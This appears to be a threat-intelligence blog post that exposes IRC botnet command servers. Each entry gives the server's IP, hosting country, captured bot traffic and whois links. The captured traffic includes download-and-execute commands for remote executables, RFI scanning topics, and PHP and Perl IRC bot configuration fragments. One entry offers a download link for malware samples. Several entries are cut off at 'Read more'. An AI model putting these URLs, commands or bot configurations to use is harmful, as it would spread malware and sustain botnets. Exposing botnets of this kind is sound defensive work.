Remote Host Port Number 194.247.48.62 1234 PASS priv9 213.251.170.52 80 64.62.181.43 80 66.197.139.152 80 PRIVMSG #ngr :[Ruskill]: Removing “C:WINDOWSsystem32drwtsn32.exe” at reboot PRIVMSG #ngr :[d=”http://datapimp.fileave.com/setup1.exe” s=”129024 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.tmp” NICK n{US|XP}rdhulwp USER rdhulwp 0 0 :rdhulwp JOIN #ngr HELO PRIVMSG #ngr :[d=”http://mediamarkinc.in/install.52145.exe” s=”73728 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” PRIVMSG #ngrRead more...
88.198.64.134(botnet hosted in Germany Network Address For Servers)
88.198.64.134:2345 Nick: New[AUT|00|P|37328] Username: XP-7319 Joined Channel: #!loco! Channel Topic for Channel #!loco!: “D http://redir.ec/images2313?=” Private Message to Channel #!loco!: “[M]: Thread Activated: Sending Message With Email.” Private Message to Channel #!loco!: “[M]: Thread Disabled.” Private Message to User New[AUT|00|P|37328]: “.hp http://domredi.com/1/” infos about hosting: http://whois.domaintools.com/88.198.64.134
14 mb malware samples
here another package with diferent malware samples ii.exe is the bot exe from snk our ruski hecker Download: http://c5be3f78.whackyvidz.com
91.121.96.162(botnet hosted in France Paris Ovh Sas)
Remote Host Port Number 91.121.96.162 5540 MODE pLagUe{USA}50784 -ix JOIN #drako MODE #drako -ix PONG irc2.accesox.net PRIVMSG #drako : Hola Amos. PONG A99D4269 JOIN ##verga## MODE ##verga## -ix PONG f2.accesox.net MODE pLagUe{USA}55216 -ix PRIVMSG ##verga## : NueVo PuTo InfeCcIoN. infos about hosting: http://whois.domaintools.com/91.121.96.162
unassigned.calpop.com(botnet hosted in United States Los Angeles Atmlink Inc)
Remote Host Port Number 174.37.200.82 80 216.178.38.224 80 216.178.39.11 80 64.208.241.41 80 69.171.224.42 80 216.240.143.200 1234 PASS xxx MODE NEW-[USA|00|P|22588] -ix JOIN #!nn! test PONG 22 MOTD NICK NEW-[USA|00|P|22588] USER XP-4207 * 0 :COMPUTERNAME infos about hosting: http://whois.domaintools.com/216.240.143.200
onlinedatingsecretfriends.com(malware hosted in United States Austin Road Runner Holdco Llc)
onlinedatingsecretfriends.com 97.79.238.39 127.0.0.1 127.0.0.1 onemouseklick.com 96.9.186.133 zonetf.com 96.9.169.85 freecdvideo.com 66.199.251.242 www.google.com 209.85.149.105 www.yahoo.com 87.248.122.122 Opened listening TCP connection on port: 55192 Outgoing connection to remote server: onlinedatingsecretfriends.com TCP port 80 Outgoing connection to remote server: freecdvideo.com TCP port 80 Outgoing connection to remote server: zonetf.com TCP port 80 Outgoing connection to remote server: zonetf.com TCPRead more...
xvm-163-151.ghst.net(botnet hosted in France Gandi Dedicated Hosting Servers)
Remote Host Port Number 95.142.163.151 5900 PASS Virus NICK VirUs-kszumcce USER VirUs “” “gpm” : 8Coded 8Ahmed.Ramzey@Hotmail.Com.. JOIN #3new# Virus PONG :TESTING3.VirUs.HERE infos about hosting: http://whois.domaintools.com/95.142.163.151
h18811652163.rev.rootvps.pl(botnet hosted in Poland Www.hitme.net.pl)
linux bots inside var $config = array(“server”=>”188.116.52.163”, “port”=>”31336”, “pass”=>”haslo”, “prefix”=>”php”, “maxrand”=>”3”, “chan”=>”#php”, “chan2″=>”#php”, “key”=>””, “modes”=>”+ps”, “password”=>”haslo”, infos about hosting: http://whois.domaintools.com/188.116.52.163
server.gasbian.com(botnet hosted in United States Chicago Hostforweb Inc)
205.234.145.229:2345 Nick: New[AUT|00|P|35974] Username: XP-3032 Joined Channel: #!loco! Channel Topic for Channel #!loco!: “D http://ibe.am/images004?=” Private Message to Channel #!loco!: “[M]: Thread Activated: Sending Message With Email.” Private Message to Channel #!loco!: “[M]: Thread Disabled.” Private Message to User New[AUT|00|P|35974]: “.hp http://domredi.com/1/” infos about hosting: http://whois.domaintools.com/205.234.145.229
phython.no-ip.biz(botnet hosted in Korea, Republic Of Seoul Hanaro Telecom Inc)
Linux bots here from egyptian hecker my $fakeproc = “/usr/sbin/httpd”; my $ircserver = “phython.no-ip.biz”; my $ircport = “7000”; my $nickname = “BR[“.int(rand(100)).”]”; my $ident = “Bra”; my $channel = “#help”; my $admin = “Bjes”; scaning actions Now talking in #help Topic On: [ #help ] [ RFI][-][][ http://www.stanford.edu//?_SERVER[DOCUMENT_ROOT]= ] Topic By: [ Subali ] ModesRead more...